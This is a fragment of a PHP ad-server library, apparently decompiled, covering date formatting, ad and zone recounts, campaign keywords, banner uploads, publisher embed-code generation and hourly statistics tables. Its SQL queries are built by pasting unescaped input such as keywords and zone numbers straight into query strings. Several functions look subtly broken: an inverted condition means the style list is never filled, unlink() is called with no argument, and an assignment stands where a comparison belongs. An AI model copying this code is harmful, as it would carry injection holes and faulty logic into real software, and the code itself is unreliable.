        else if ( $s["date_form_".$y."a"] == "Nothing" )
        {
            $date_separator[$y] = "";
        }
        else
        {
            $date_separator[$y] = $s["date_form_".$y."a"];
        }
    }
    $x[d] = date( "d", $cas );
    $x[m] = date( "m", $cas );
    $x[y] = date( "Y", $cas );
    $datum = $x[$s[date_form_1]].$date_separator[1].$x[$s[date_form_2]].$date_separator[2].$x[$s[date_form_3]].$date_separator[3];
    if ( $plustime )
    {
        if ( $s[time_form] == "12" )
        {
            $datum .= date( ", g:i a", $cas );
            return $datum;
        }
        $datum .= date( ", G:i", $cas );
    }
    return $datum;
}

function date_select_past( $in )
{
    global $s;
    if ( is_array( $in ) )
    {
        $date_d = $in[date_d];
        $date_m = $in[date_m];
        $date_y = $in[date_y];
    }
    else if ( $in )
    {
        list( $date_d, $date_m, $date_y ) = explode( "|", date( "j|m|Y", $in ) );
    }
    $select[d] = "<select name=\"date_d\" class=\"field10\"><option value=\"0\">N/A</option>".select_days( $date_d )."</select>";
    $select[m] = "<select name=\"date_m\" class=\"field10\"><option value=\"0\">N/A</option>".select_months( $date_m )."</select>";
    $select[y] = "<select name=\"date_y\" class=\"field10\"><option value=\"0\">N/A</option>".select_years_past( $date_y )."</select>";

    for ( $y = 1; $y <= 3; ++$y )
    {
        if ( $s["date_form_".$y."a"] == "Space" )
        {
            $date_separator[$y] = " ";
        }
        else if ( $s["date_form_".$y."a"] == "Nothing" )
        {
            $date_separator[$y] = "";
        }
        else
        {
            $date_separator[$y] = $s["date_form_".$y."a"];
        }
    }
    $date = $select[$s[date_form_1]].$date_separator[1].$select[$s[date_form_2]].$date_separator[2].$select[$s[date_form_3]].$date_separator[3];
    if ( !$in )
    {
        $date = str_replace( " selected", "", $date );
    }
    return $date;
}

function fix_pub_places_n_for_zone( $zone )
{
    global $s;
    $q = dq( "select count(*) from ".$s['pr']."p_pl where zone = '{$zone}'", 1 );
    $x = mysql_fetch_row( $q );
    dq( "update ".$s['pr']."zones set p_places = '{$x['0']}' where n = '{$zone}'", 1 );
}

function recount_ads_in_zone( $zone )
{
    global $s;
    if ( $zone == -1 || !$zone && !is_numeric( $zone ) )
    {
        return false;
    }
    $q = dq( "select count(*) from ".$s['pr']."ads where zones like '%\\_{$zone}\\_%' and def = 0", 1 );
    $ads = mysql_fetch_row( $q );
    $q = dq( "select count(*) from ".$s['pr']."ads where zones like '%\\_{$zone}\\_%' and def = 1", 1 );
    $default = mysql_fetch_row( $q );
    dq( "update ".$s['pr']."zones set ads = '{$ads['0']}', def_ads = '{$default['0']}' where n = '{$zone}'", 1 );
}

function update_keywords_for_campaign( $n, $campaign_n, $new_words )
{
    global $s;
    $q = dq( "select * from ".$s['pr']."c_words where n = '{$n}' and camp = '{$campaign_n}'", 1 );
    while ( $x = mysql_fetch_assoc( $q ) )
    {
        ++$pocet;
        $old_words[$pocet] = $x[word];
        $old[$pocet] = $x;
    }
    dq( "delete from ".$s['pr']."c_words where n = '{$n}' and camp = '{$campaign_n}'", 1 );
    $words = explode( ",", $new_words );
    foreach ( $words as $k1 => $word )
    {
        $word = trim( $word );
        if ( $word )
        {
            $old_n = array_search( $word, $old_words );
            if ( $old_n )
            {
                $c = $old[$old_n][c];
                $i = $old[$old_n][i];
            }
            else
            {
                $c = $i = 0;
            }
            dq( "insert into ".$s['pr']."c_words values('{$n}','{$campaign_n}','{$word}','{$i}','{$c}')", 1 );
        }
    }
    $q = dq( "select word from ".$s['pr']."c_words where n = '{$n}'", 1 );
    while ( $x = mysql_fetch_assoc( $q ) )
    {
        $a[] = "_".$x[word]."_";
    }
    if ( in_array( "_a_", $a ) )
    {
        $keywords_ready = "a";
    }
    else
    {
        $keywords_ready = implode( " ", $a );
    }
    dq( "update ".$s['pr']."ads set keywords = '{$keywords_ready}' where n = '{$n}'", 1 );
}

function get_keywords_of_ad_campaign( $n, $camp )
{
    global $s;
    global $m;
    if ( $camp )
    {
        $camp = " and camp = '".$camp."'";
    }
    else
    {
        unset( $camp );
    }
    $q = dq( "select word from ".$s['pr']."c_words where n = '{$n}' {$camp}", 1 );
    while ( $x = mysql_fetch_assoc( $q ) )
    {
        $a[] = $x[word];
    }
    return $a;
}

function get_styles_list( $plus_common )
{
    global $s;
    $dr = opendir( $s[phppath]."/styles" );
    rewinddir( $dr );
    while ( $q = readdir( $dr ) )
    {
        if ( !( $q != "." ) && !( $q != ".." ) && !( $q != "_common" ) && !is_dir( $s['phppath']."/styles/{$q}" ) )
        {
            $styles_list[] = $q;
        }
    }
    closedir( $dr );
    if ( $plus_common )
    {
        $styles_list[] = "_common";
    }
    sort( $styles_list );
    //print_r($styles_list);
    return $styles_list;
}

function ad_template_preview( $template, $text_names )
{
    global $s;
    $file = file( $s['phppath']."/data/{$template}" );
    foreach ( $file as $k => $v )
    {
        $content .= $v;
    }

    for ( $x = 1; $x <= 10; ++$x )
    {
        if ( $text_names["name".$x] )
        {
            $content = str_replace( "#%text".$x."%#", $text_names["name".$x], $content );
        }
    }
    return stripslashes( str_replace( "#%", "", str_replace( "%#", "", $content ) ) )."<br><br>";
}

function select_month( $name )
{
    return "<select name=\"".$name."\" class=\"field10\">\r\n<option value=\"1\">January</option>\r\n<option value=\"2\">February</option>\r\n<option value=\"3\">March</option>\r\n<option value=\"4\">April</option>\r\n<option value=\"5\">May</option>\r\n<option value=\"6\">June</option>\r\n<option value=\"7\">July</option>\r\n<option value=\"8\">August</option>\r\n<option value=\"9\">September</option>\r\n<option value=\"10\">October</option>\r\n<option value=\"11\">November</option>\r\n<option value=\"12\">December</option>\r\n</select>";
}

function upload_one_file( $n, $file_n, $original_name, $type, $tmp_name, $error, $file_size, $need_w, $need_h, $old_file, $flash_allowed )
{
    global $s;
    global $m;
    $resize_it = 1;
    $extension_temp = str_replace( ".", "", strrchr( $original_name, "." ) );
    $working_name = $s['phppath']."/{$s['banners_dir']}/".md5( microtime( ) ).".".$extension_temp;
    if ( !is_uploaded_file( $tmp_name ) )
    {
        return array(
            "",
            "",
            "",
            "Unable to upload file ".$original_name
        );
    }
    if ( file_exists( $working_name ) )
    {
        unlink( $working_name );
    }
    move_uploaded_file( $tmp_name, $working_name );
    $size = getimagesize( $working_name );
    $extension_n = strtolower( $size[2] );
    if ( $extension_n == 1 )
    {
        $extension = "gif";
    }
    else if ( $extension_n == 2 )
    {
        $extension = "jpg";
    }
    else if ( $extension_n == 3 )
    {
        $extension = "png";
    }
    else if ( strstr( $original_name, ".swf" ) && strstr( $type, "flash" ) && $flash_allowed )
    {
        $extension = "swf";
    }
    else
    {
        $problem[] = $m['not_allowed_format']." {$original_name}";
    }
    if ( $extension == "gif" )
    {
        $extension = "png";
    }
    $file_name = $n."-{$file_n}-{$s['cas']}.{$extension}";
    $file_path = $s['phppath']."/{$s['banners_dir']}/{$file_name}";
    $original_w = $size[0] / $need_w;
    $original_h = $size[1] / $need_h;
    if ( $problem )
    {
        unlink( );
        return array(
            "problem" => $problem
        );
    }
    if ( $resize_it && $extension != "swf" )
    {
        include_once( $s['phppath']."/administration/resize.php" );
        if ( $need_w && $need_h )
        {
            if ( $need_w < $size[0] || $need_h < $size[1] )
            {
                $thumb = new thumbnail( $working_name );
                if ( $original_h < $original_w )
                {
                    $thumb->size_width( $need_w );
                }
                else
                {
                    $thumb->size_height( $need_h );
                }
                $thumb->save( $s['phppath']."/{$s['banners_dir']}/{$file_name}" );
            }
            else
            {
                copy( $working_name, $s['phppath']."/{$s['banners_dir']}/{$file_name}" );
            }
        }
        $file_url = $s['site_url']."/{$s['banners_dir']}/{$file_name}";
    }
    else if ( $extension == "swf" )
    {
        copy( $working_name, $s['phppath']."/{$s['banners_dir']}/{$file_name}" );
        $file_url = $s['site_url']."/{$s['banners_dir']}/{$file_name}";
    }
    if ( file_exists( $file_path ) )
    {
        chmod( $file_path, 420 );
        dq( "update ".$s['pr']."ads set banner = '{$file_url}', picture{$file_n} = '{$file_url}' where n = '{$n}'", 1 );
        if ( trim( $old_file ) )
        {
            unlink( str_replace( $s[site_url], $s[phppath], $old_file ) );
        }
    }
    unlink( $working_name );
    if ( $problem )
    {
        unlink( $file_path );
    }
    return array(
        "url" => $file_url,
        "extension" => $extension,
        "size" => $file_size
    );
}

function get_common_variables( )
{
    global $s;
    $vl[adminemail] = $s[adminemail];
    $vl[currency] = $s[currency];
    $vl[month_name] = date( "F Y", $s[cas] );
    $vl[site_url] = $s[site_url];
    $vl[site_title] = $s[site_title];
    $vl[charset] = $s[charset];
    return $vl;
}

function get_banner_target_of_zone( $zone )
{
    global $s;
    $q = dq( "select banner_target from ".$s['pr']."zones where n = '{$zone}'", 1 );
    $target = mysql_fetch_row( $q );
    return $target[0];
}

function recount_campaigns_for_ad( $ad )
{
    global $s;
    $q = dq( "select count(*) from ".$s['pr']."c where n = '{$ad}'", 1 );
    $x = mysql_fetch_row( $q );
    dq( "update ".$s['pr']."ads set campaigns = '{$x['0']}' where n = '{$ad}'", 1 );
}

function get_code( $in )
{
    global $s;
    global $m;
    if ( $in[n] )
    {
        $place_vars = get_pub_place_variables( $in[n], $s[AdM_P_n] );
        $place_vars[pl_n] = $place_vars[n];
        if ( $place_vars[zone] <= 0 )
        {
            $s[info] = iot( $m[place_not_configured] );
            publisher_place_edit( $place_vars );
        }
        if ( $place_vars[n] )
        {
            $place_n = $place_vars[n];
            $zone_vars = get_zone_variables( $place_vars[zone] );
            $ad_type_n = $zone_vars[ad_type];
            $in[reload] = $in[reload_seconds] = 0;
            $a[pl_n] = $place_vars[n];
            $a[title] = $place_vars[title];
            if ( $s[p_code_reload] && $s[p_code_reload_seconds] )
            {
                $in[reload] = 1;
                $in[reload_seconds] = $s[p_code_reload_seconds];
            }
            if ( $s[all_ad_types][$ad_type_n][ad_type] == "fpad" && ( !$in[continue_url] && !$in[continue_title] ) )
            {
                page_from_template( "publisher_place_code_fpad_step1.html", $a );
            }
            $zones_n = $place_vars[zone];
        }
        else
        {
            $place_n = 0;
        }
    }
    if ( $in[zones_or_keywords] == "lug" )
    {
        $in[zones_or_keywords] = "keywords";
        $in[keywords] = "#.%ad_manager%#";
        $no_php = 1;
    }
    if ( !$place_n )
    {
        if ( $in[zones_or_keywords] == "keywords" )
        {
            $zone_n = 0;
            $keywords = str_replace( ",,", ",", str_replace( " ", ",", $in[keywords] ) );
            if ( !trim( $keywords ) )
            {
                $keywords = "a";
            }
            $ad_type_n = $ad_type_for_code = $in[ad_type];
        }
        else if ( $in[zones_or_keywords] == "zones" )
        {
            if ( $in[zones][0] && is_numeric( $in[zones][0] ) )
            {
                $zones_n = implode( ",", $in[zones] );
                $zone_vars = get_zone_variables( $in[zones][0] );
                $ad_type_n = $zone_vars[ad_type];
            }
            else
            {
                $ad_type_n = $ad_type_for_code = $in[ad_type];
            }
        }
    }
    if ( !$ad_type_n )
    {
        $s[info] = iot( $m[place_not_configured] );
        publisher_place_edit( $place_vars );
    }
    $ad_type_vars = $s[all_ad_types][$ad_type_n];
    $ad_type_google_dhtml_vars = get_ad_type_google_dhtml_variables( $ad_type_vars[n] );
    if ( $place_vars[track_what] == "url" )
    {
        $a[use_where] = $m[use_code_url]." ".$place_vars[url];
    }
    else if ( $place_vars[track_what] == "domain" )
    {
        $a[use_where] = $m[use_code_domain]." ".$place_vars[url];
    }
    else if ( $place_vars[track_what] == "all" || !$a[track_what] )
    {
        $a[use_where] = $m[use_code_anywhere];
    }
    if ( $ad_type_vars[ad_type] == "google" )
    {
        $s[color_style] = $ad_type_vars[color_style];
        $pocet = 0;
        if ( !is_numeric( $in[color_style] ) )
        {
            $in[color_style] = $s[color_style];
        }
        if ( $color_style_selected[$in[color_style]] = " selected" )
        {
            $ad_type_google_dhtml_vars[color_style] = $s[color_style];
        }
        $q = dq( "select * from ".$s['pr']."ads_colors order by title", 1 );
        while ( $x = mysql_fetch_assoc( $q ) )
        {
            if ( $colors_max < $x[n] )
            {
                $colors_max = $x[n];
            }
            if ( !$x[user] || !$have_group[standard] )
            {
                if ( $have_group[user] )
                {
                    $a[color_styles_options] .= "</optgroup>";
                }
                $have_group[standard] = 1;
            }
            $a[color_styles_options] .= "<span id=\"option_n_".$x[n]."\"><option ".$visibility." value=\"".( $x['border']."-{$x['background']}-{$x['color1']}-{$x['color2']}-{$x['color3']}-{$x['color4']}-{$x['color5']}-{$x['color6']}-{$x['color7']}-{$x['color8']}-{$x['color9']}-{$x['color10']}" )."\"".$color_style_selected[$x[n]]." id=\"option_n_".$x[n]."\">".$x[title]."</option></span>";
            $ads_colors[$x[n]][border] = $x[border];
            $ads_colors[$x[n]][background] = $x[background];

            for ( $x1 = 1; $x1 <= 10; ++$x1 )
            {
                $ads_colors[$x[n]]["text".$x1] = $x["text".$x1];
            }
            if ( $x[n] == $ad_type_vars[color_style] )
            {
                $a[ad_color_border] = $x[border];
                $a[ad_color_backgound] = $x[background];

                for ( $y = 1; $y <= 10; ++$y )
                {
                    if ( $ad_type_google_dhtml_vars["label".$y] )
                    {
                        $ad_color_text[$y] = $x["color".$y];
                        $a[colors_in_code] .= "code_value += \"c_text".$y." = &#92;\"\"+c_text".$y."+\"&#92;\";&#92;n\";\n";
                        $a[colors_defined] .= "var c_text".$y." = get_code_form.field_".$y.".value.replace('#','');\n";
                    }
                }
            }
            ++$pocet;
            if ( $x[n] == $in[color_style] )
            {
                $default_colors = $x;
            }
        }

        for ( $x = 1; $x <= 10; ++$x )
        {
            if ( $ad_type_google_dhtml_vars["label".$x] )
            {
                $a[color_fields] .= "<tr>\r\n    <td align=\"left\" valign=\"top\" nowrap width=\"130\" onmouseover=\"change_colors()\" onmouseout=\"change_colors()\">\r\n    <span onmouseover=\"change_colors()\" onmouseout=\"change_colors()\">".$ad_type_google_dhtml_vars["label".$x]."</span>\r\n    </td>\r\n    <td align=\"left\" valign=\"top\" nowrap width=\"250\">\r\n    <INPUT class=\"field10\" maxLength=\"7\" size=\"10\" name=\"ad_color_text".$x."\" id=\"field_".$x."\" value=\"".$ad_color_text[$x]."\" onblur=\"change_colors()\" onchange=\"change_colors()\" onfocus=\"change_colors()\" onmouseover=\"change_colors()\" onmouseout=\"change_colors()\" onkeyup=\"change_colors()\">\r\n    <a href=\"java script:TCP.popup(document.forms['get_code_form'].elements['ad_color_text".$x."'],0)\"><img border=\"0\" src=\"".$s[site_url]."/images/color_picker_select.gif\"></a>\r\n    </td>\r\n    </tr>";
            }
        }
        $q = dq( "select * from ".$s['pr']."ad_type_templates where ad_type = '{$ad_type_vars['n']}'", 1 );
        while ( $x = mysql_fetch_assoc( $q ) )
        {
            if ( $x[template_big] )
            {
                if ( $x[n] == 1 )
                {
                    $checked = " checked";
                }
                else
                {
                    $checked = "";
                }
                $a[ad_shapes_options] .= "<tr>\r\n    <td align=\"left\" valign=\"top\" nowrap colspan=\"2\" onmouseover=\"change_colors()\" class=\"cell_embosed2\"><input type=\"radio\" name=\"shape\" value=\"".$x[n]."\"".$checked.">".ads_block_preview_google( $ad_type_google_dhtml_vars, $x, $ad_type_vars[color_style] )."</td>\r\n    </tr>";
                ++$a[shapes_amount];
            }
        }
        $preview = google_ad_preview( $ad_type_google_dhtml_vars, "" );

        for ( $x = 1; $x <= 10; ++$x )
        {
            $y = $x + 1;
            if ( strstr( $preview, "text".$x ) )
            {
                $a[getElementById_texts] .= "document.getElementById('text".$x."').style.color = curr_array[{$y}];\n";
                $a[getElementById_fields] .= "document.getElementById('field_".$x."').value = curr_array[{$y}];\n";
                $a[change_colors_texts] .= "if (get_code_form.field_".$x.".value!='') document.getElementById('text{$x}').style.color = get_code_form.field_{$x}.value;";
            }
        }
        $tds = substr_count( $preview, "<td" );

        for ( $x = 0; $x <= $tds - 1; ++$x )
        {
            $a[getElementById_tds] .= "document.getElementById(\"preview_td".$x."\").style.backgroundColor = _split[1];\n";
            $a[change_colors_tds] .= "if (get_code_form.field_12.value!='') document.getElementById(\"preview_td".$x."\").style.backgroundColor = get_code_form.field_12.value;";
        }
        $line_parts = explode( "<td", $preview );
        unset( $preview );
        foreach ( $line_parts as $k => $v )
        {
            $preview .= $v;
            $k1 = $k + 1;
            if ( $line_parts[$k1] )
            {
                $preview .= "<td id=\"preview_td".$k."\"";
            }
        }
        $a[preview] = $preview;
        if ( $in[admin] )
        {
            $a[user] = "x";
            $s[hide_for_admin] = 1;
            $a[hide_for_admin_begin] = "<!--";
            $a[hide_for_admin_end] = "-->";
        }
        if ( $zones_n )
        {
            $code_arguments[] = "code_value += \"zone = &#92;\"".$zones_n."&#92;\";&#92;n\";";
        }
        if ( $place_n )
        {
            $code_arguments[] = "code_value += \"pl = &#92;\"".$place_n."&#92;\";&#92;n\";";
        }
        if ( $keywords )
        {
            $code_arguments[] = "code_value += \"w = &#92;\"".$keywords."&#92;\";&#92;n\";";
        }
        if ( $ad_type_for_code )
        {
            $code_arguments[] = "code_value += \"ad_type = &#92;\"".$ad_type_for_code."&#92;\";&#92;n\";";
        }
        $a[variables] = implode( "\n", $code_arguments );
        page_from_template( "publisher_place_code_google.html", $a );
        exit( );
    }
    if ( $ad_type_vars[ad_type] == "banner" )
    {
        if ( $zones_n )
        {
            $code_arguments[] = "z=".$zones_n;
        }
        if ( $place_n )
        {
            $code_arguments[] = "pl=".$place_n;
        }
        if ( $keywords )
        {
            $code_arguments[] = "w=".$keywords;
        }
        if ( $ad_type_for_code )
        {
            $code_arguments[] = "ad_type=".$ad_type_for_code;
        }
        if ( !$code_arguments )
        {
            $code_arguments[] = "z=".$zones_n;
        }
        $code[adfile] = $s['site_url']."/{$s['ad_php']}?".implode( "&", $code_arguments );
        $code[width] = $ad_type_vars[w];
        $code[height] = $ad_type_vars[h];
        $a[code_single] = "<img border=\"0\" src=\"".$s[site_url]."/images/previews/".$ad_type_vars[n]."-1.gif\" width=\"".$code[width]."\" height=\"".$code[height]."\"><br><br><textarea class=\"field10\" rows=\"10\" name=\"text\" cols=\"90\" style=\"width:700px\">".htmlspecialchars( parse_part( "publisher_place_code_banner.txt", $code ) )."</textarea>";
        if ( !$no_php || ( !$place_n && $s[p_code_php_incl] ) )
        {
            $code[adfile] = $s['site_url']."/{$s['ad_php']}?".implode( "&", $code_arguments )."&incl=1";
            $codes_multi[] = "<tr><td align=\"center\" class=\"cell_embosed1\">".$m[this_code_shows]." 1 ".$m[banner].".<br>".$m[code_uses_php]."</td></tr>\r\n    <tr><td align=\"center\" class=\"cell_embosed2\"><img border=\"0\" src=\"".$s[site_url]."/images/previews/".$ad_type_vars[n]."-1.gif\" width=\"".$code[width]."\" height=\"".$code[height]."\"><br><br><textarea class=\"field10\" rows=\"10\" name=\"text\" cols=\"90\" style=\"width:700px\">".htmlspecialchars( parse_part( "publisher_place_code_banner_php.txt", $code ) )."</textarea></td>\r\n    </tr>";
        }
        if ( $in[reload] && is_numeric( $in[reload_seconds] ) )
        {
            $code[adfile] = $s['site_url']."/{$s['ad_php']}?".implode( "&", $code_arguments ).( "&rl=".$in['reload_seconds'] );
            $codes_multi[] = "<tr><td align=\"center\" class=\"cell_embosed1\">".$m[this_code_shows]." 1 ".$m[banner].". ".$m[loads_new_banners]." ".$in[reload_seconds]." ".$m[seconds].".</td></tr>\r\n    <tr><td align=\"center\" class=\"cell_embosed2\"><img border=\"0\" src=\"".$s[site_url]."/images/previews/".$ad_type_vars[n]."-1.gif\" width=\"".$code[width]."\" height=\"".$code[height]."\"><br><br><textarea class=\"field10\" rows=\"5\" name=\"text\" cols=\"90\" style=\"width:700px\">".htmlspecialchars( parse_part( "publisher_place_code_banner_iframe.txt", $code ) )."</textarea></td>\r\n    </tr>";
        }
        if ( !$place_n && $s[p_code_templates] )
        {
            $q = dq( "select * from ".$s['pr']."ad_type_templates where ad_type = '{$ad_type_vars['n']}'", 1 );
            while ( $ad_type_template_vars = mysql_fetch_assoc( $q ) )
            {
                $code[width] = $ad_type_template_vars[w];
                $code[height] = $ad_type_template_vars[h];
                $code[adfile] = $s['site_url']."/{$s['ad_php']}?".implode( "&", $code_arguments ).( "&shape=".$ad_type_template_vars['n'] );
                $codes_multi[] = "<tr><td align=\"center\" class=\"cell_embosed1\">".$m[this_code_shows]." ".$ad_type_template_vars[ads]." ".$m[banners].".</td></tr>\r\n      <tr><td align=\"center\" class=\"cell_embosed2\">".ads_block_preview_banner( $ad_type_vars, $ad_type_template_vars )."<textarea class=\"field10\" rows=\"10\" name=\"text\" cols=\"90\" style=\"width:700px\">".htmlspecialchars( parse_part( "publisher_place_code_banner.txt", $code ) )."</textarea></td>\r\n      </tr>";
                if ( $in[reload] && is_numeric( $in[reload_seconds] ) )
                {
                    $code[adfile] = $code[adfile] = $s['site_url']."/{$s['ad_php']}?".implode( "&", $code_arguments ).( "&shape=".$ad_type_template_vars['n']."&rl={$in['reload_seconds']}" );
                    $codes_multi[] = "<tr><td align=\"center\" class=\"cell_embosed1\">".$m[this_code_shows]." ".$ad_type_template_vars[ads]." ".$m[banners].". ".$m[loads_new_banners]." ".$in[reload_seconds]." ".$m[seconds].".</td></tr>\r\n        <tr><td align=\"center\" class=\"cell_embosed2\">".ads_block_preview_banner( $ad_type_vars, $ad_type_template_vars )."<textarea class=\"field10\" rows=\"5\" name=\"text\" cols=\"90\" style=\"width:700px\">".htmlspecialchars( parse_part( "publisher_place_code_banner_iframe.txt", $code ) )."</textarea></td>\r\n        </tr>";
                }
                if ( $no_php || $place_n && !$s[p_code_php_incl] )
                {
                    $code[adfile] = $s['site_url']."/{$s['ad_php']}?".implode( "&", $code_arguments ).( "&shape=".$ad_type_template_vars['n']."&incl=1" );
                    $codes_multi[] = "<tr><td align=\"center\" class=\"cell_embosed1\">".$m[this_code_shows]." ".$ad_type_template_vars[ads]." ".$m[banners].".<br>".$m[code_uses_php]."</td></tr>\r\n        <tr><td align=\"center\" class=\"cell_embosed2\">".ads_block_preview_banner( $ad_type_vars, $ad_type_template_vars )."<textarea class=\"field10\" rows=\"10\" name=\"text\" cols=\"90\" style=\"width:700px\">".htmlspecialchars( parse_part( "publisher_place_code_banner_php.txt", $code ) )."</textarea></td>\r\n        </tr>";
                }
            }
        }
        if ( count( $codes_multi ) )
        {
            if ( $place_vars[track_what] == "url" )
            {
                $a[use_where] = $m[use_codes_url]." ".$place_vars[url];
            }
            else if ( $place_vars[track_what] == "domain" )
            {
                $a[use_where] = $m[use_codes_domain]." ".$place_vars[url];
            }
            else if ( $place_vars[track_what] == "all" || !$a[track_what] )
            {
                $a[use_where] = $m[use_codes_anywhere];
            }
        }
        $a[codes_multi] = implode( "", $codes_multi );
        page_from_template( "publisher_place_code_banner.html", $a );
        exit( );
    }
    if ( $ad_type_vars[ad_type] == "dhtml" || $ad_type_vars[ad_type] == "page" )
    {
        $a[adfile] = $s['site_url']."/{$s['ad_js']}";
        if ( $zones_n )
        {
            $code_arguments[] = "zone = \"".$zones_n."\";";
        }
        if ( $place_n )
        {
            $code_arguments[] = "pl = \"".$place_n."\";";
        }
        if ( $keywords )
        {
            $code_arguments[] = "w = \"".$keywords."\";";
        }
        if ( $ad_type_for_code )
        {
            $code_arguments[] = "ad_type = \"".$ad_type_for_code."\";";
        }
        $a[variables] = implode( "\n", $code_arguments );
        if ( $ad_type_vars[ad_type] == "page" )
        {
            $a[preview] = "<a href=\"#\" onclick=\"preview_window('".$s[site_url]."/preview.php?action=show_style_preview_page&n=".$ad_type_vars[n]."')\">".$m[click_to_open]."</a>";
        }
        else
        {
            $a[preview] = "<iframe width=\"".$ad_type_vars[w]."\" height=\"".$ad_type_vars[h]."\" src=\"".$s[site_url]."/preview.php?action=show_style_preview_in_iframe&n=".$ad_type_vars[n]."\" scrolling=\"no\" frameborder=\"0\"></iframe>";
        }
        page_from_template( "publisher_place_code_dhtml.html", $a );
        exit( );
    }
    if ( $ad_type_vars[ad_type] == "fpad" )
    {
        if ( $zones_n )
        {
            $code_arguments[] = "z=".$zones_n;
        }
        if ( $place_n )
        {
            $code_arguments[] = "pl=".$place_n;
        }
        if ( $keywords )
        {
            $code_arguments[] = "w=".$keywords;
        }
        if ( $ad_type_for_code )
        {
            $code_arguments[] = "ad_type=".$ad_type_for_code;
        }
        $code_arguments[] = "continue_url=".urlencode( $in[continue_url] );
        $code_arguments[] = "continue_title=".urlencode( $in[continue_title] );
        $a[ad_url] = $s['site_url']."/{$s['ad_php']}?".implode( "&", $code_arguments );
        $a[preview] = "<a href=\"#\" onclick=\"preview_window('".$s[site_url]."/preview.php?action=show_style_preview_fpad&n=".$ad_type_vars[n]."')\">".$m[click_to_open]."</a>";
        $a[continue_url] = $in[continue_url];
        page_from_template( "publisher_place_code_fpad.html", $a );
    }
    exit( );
}

function get_fckeditor( $field_name, $value, $base_path, $toolbar, $width, $height )
{
    global $s;
    include_once( $s['phppath']."/FCKeditor/fckeditor.php" );
    $sBasePath = $_SERVER['PHP_SELF'];
    $sBasePath = substr( $sBasePath, 0, strpos( $sBasePath, "_samples" ) );
    $oFCKeditor = new fckeditor( $field_name );
    $oFCKeditor->BasePath = $base_path;
    $oFCKeditor->Height = 300;
    $oFCKeditor->Width = 650;
    $oFCKeditor->Height = $height;
    $oFCKeditor->Width = $width;
    $oFCKeditor->ToolbarSet = $toolbar;
    $oFCKeditor->Value = str_replace( "&quot;", "\"", stripslashes( $value ) );
    return $oFCKeditor->create( );
}

function refund_html( $text )
{
    return str_replace( "&lt;", "<", str_replace( "&gt;", ">", str_replace( "&quot;", "\"", $text ) ) );
}

function today_graph_vertical( $a )
{
    global $s;
    global $m;
    $left = "<td align=\"center\" nowrap class=\"cell_embosed4\">";

    for ( $x = 0; $x <= 23; ++$x )
    {
        if ( $a["i".$x] )
        {
            $i[$x] = $a["i".$x];
        }
        else
        {
            $i[$x] = 0;
        }
        if ( $a["c".$x] )
        {
            $c[$x] = $a["c".$x];
        }
        else
        {
            $c[$x] = 0;
        }
        $r[$x] = number_format( 100 * $c[$x] / $i[$x], 2 );
        $radek1[$x] = $radek2[$x] = $radek3[$x] = "<tr><td align=\"center\" class=\"cell_embosed1\" nowrap><span class=\"text10\">".$x."</span></td>";
        $radek1[$x] .= $left.$i[$x]."</span></td>";
        $radek2[$x] .= $left.$c[$x]."</span></td>";
        $radek3[$x] .= $left.$r[$x]."%</span></td>";
        if ( $big1 < $i[$x] )
        {
            $big1 = $i[$x];
        }
        if ( $big2 < $c[$x] )
        {
            $big2 = $c[$x];
        }
        $round_ratio = number_format( 100 * $c[$x] / $i[$x], 2 );
        if ( $big3 < $round_ratio )
        {
            $big3 = $round_ratio;
        }
    }
    $table[1] = $table[2] = $table[3] = "<table border=\"0\" cellpadding=\"2\" cellspacing=\"0\"><tr><td align=\"center\" class=\"cell_embosed1\"><span class=\"text10\">".$m[hour]."</span></td>";
    $table[1] .= "<td align=\"center\" class=\"cell_embosed1\" nowrap width=\"70\"><span class=\"text10\">".$m[Impressions]."</span></td><td align=\"center\" class=\"cell_embosed1\"><img border=\"0\" src=\"images/blank.gif\" width=\"130\" height=\"1\"></td></tr>";
    $table[2] .= "<td align=\"center\" class=\"cell_embosed1\" nowrap width=\"70\"><span class=\"text10\">".$m[Clicks]."</span></td><td align=\"center\" class=\"cell_embosed1\"><img border=\"0\" src=\"images/blank.gif\" width=\"130\" height=\"1\"></td></tr>";
    $table[3] .= "<td align=\"center\" class=\"cell_embosed1\" nowrap width=\"70\"><span class=\"text10\">".$m[Ratio]."</span></td><td align=\"center\" class=\"cell_embosed1\"><img border=\"0\" src=\"images/blank.gif\" width=\"130\" height=\"1\"></td></tr>";
    $pomer1 = $big1 / 130;
    $pomer2 = $big2 / 130;
    $pomer3 = $big3 / 130;

    for ( $x = 0; $x <= 23; ++$x )
    {
        if ( $pomer1 )
        {
            $i[$x] = ceil( $i[$x] / $pomer1 );
        }
        if ( $pomer2 )
        {
            $c[$x] = ceil( $c[$x] / $pomer2 );
        }
        if ( $pomer3 )
        {
            $r[$x] = ceil( $r[$x] / $pomer3 );
        }
        if ( !$i[$x] )
        {
            $i[$x] = 1;
        }
        if ( !$c[$x] )
        {
            $c[$x] = 1;
        }
        if ( $r[$x] < 1 )
        {
            $r[$x] = 1;
        }
        $table[1] .= $radek1[$x]."<td align=\"left\" valign=\"middle\" class=\"cell_embosed4\"><img src=\"".$s[site_url]."/images/graph_vertical_1.jpg\" width=\"".$i[$x]."\" height=\"10\"></td></tr>";
        $table[2] .= $radek2[$x]."<td align=\"left\" valign=\"middle\" class=\"cell_embosed4\"><img src=\"".$s[site_url]."/images/graph_vertical_2.jpg\" width=\"".$c[$x]."\" height=\"10\"></td></tr>";
        $table[3] .= $radek3[$x]."<td align=\"left\" valign=\"middle\" class=\"cell_embosed4\"><img src=\"".$s[site_url]."/images/graph_vertical_3.jpg\" width=\"".$r[$x]."\" height=\"10\"></td></tr>";
    }
    $table[1] .= "</table>";
    $table[2] .= "</table>";
    $table[3] .= "</table>";
    return $table;
}

function today_graph_horizontal( $a )
{
    global $s;
    global $m;
    $left = "<td align=\"center\" nowrap class=\"cell_embosed4\" width=\"30\">";
    $line_day_number = "<td align=\"left\" class=\"cell_embosed1\"><span class=\"text10\">".$m[hour]."</span></td>";

    for ( $x = 0; $x <= 23; ++$x )
    {
        if ( $a["i".$x] )
        {
            $i[$x] = $a["i".$x];
        }
        else
        {
            $i[$x] = 0;
        }
        if ( $a["c".$x] )
        {
            $c[$x] = $a["c".$x];
        }
        else
        {
            $c[$x] = 0;
        }
        $r[$x] = number_format( 100 * $c[$x] / $i[$x], 2 );
        $line_value_i .= $left.$i[$x]."</td>\n";
        $line_value_c .= $left.$c[$x]."</td>\n";
        $line_value_r .= $left.$r[$x]."</td>\n";
        if ( $big1 < $i[$x] )
        {
            $big1 = $i[$x];
        }
        if ( $big2 < $c[$x] )
        {
            $big2 = $c[$x];
        }
